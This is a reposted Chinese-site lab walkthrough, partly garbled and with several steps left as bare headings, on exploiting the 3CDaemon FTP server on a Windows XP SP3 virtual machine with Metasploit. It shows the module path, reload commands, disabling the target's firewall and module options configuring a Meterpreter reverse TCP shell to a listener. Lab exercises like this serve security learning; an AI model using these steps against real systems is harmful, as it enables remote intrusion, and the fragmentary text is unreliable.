3cdaemon漏洞挖掘 Exploit

发布时间：2020-12-14 02:17:28 所属栏目：大数据来源：网络整理

导读：OS：bt5 metasploit 目标机器：windows xp 32bits 1 Get "jmp esp" 2 Use Metasploit to exploit 3cdaemon (1)? /opt/framework3/msf3/modules/exploits/windows/ftp # vi 3cdaemon_ftp_user.rb ? ?(2) in another console, msf exploit(3cdaemon_ftp_user)

OS：bt5

metasploit

目标机器：windows xp 32bits

1 Get "jmp esp"

2 Use Metasploit to exploit 3cdaemon

(1)?

/opt/framework3/msf3/modules/exploits/windows/ftp

# vi 3cdaemon_ftp_user.rb

?(2) in another console,

msf exploit(3cdaemon_ftp_user) > reload
[*] Reloading module...
msf exploit(3cdaemon_ftp_user) >

(3) add 2nd Network Adapter for winxp-sp3?. the 2nd?Network Adapter is "Bridged".

Reboot the Client- Virtual Machine and after restarting,you can see the 2nd Network Adapter,and configure it or it has been DHCPed.

ping the Metasploit Host Machine if the ping fails,make the firewall on the client machine disabled.

Now the ping works.

msf exploit(3cdaemon_ftp_user) > show options

Module options (exploit/windows/ftp/3cdaemon_ftp_user):

?? Name???? Current Setting????? Required? Description
?? ----???? ---------------????? --------? -----------
?? FTPPASS? ? no??????? The password for the specified username
?? FTPUSER? anonymous??????????? no??????? The username to authenticate as
?? RHOST??? 192.168.40.132?????? yes?????? The target address
?? RPORT??? 21?????????????????? yes?????? The target port

Payload options (windows/meterpreter/reverse_tcp):

?? Name????? Current Setting? Required? Description
?? ----????? ---------------? --------? -----------
?? EXITFUNC? process????????? yes?????? Exit technique: seh,thread,process,none
?? LHOST???? 192.168.40.29??? yes?????? The listen address
?? LPORT???? 4444???????????? yes?????? The listen port

Exploit target:

?? Id? Name
?? --? ----
?? 4?? Windows XP English SP3

3 Olldbg to check 3cdaemon status

4 Adjust

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!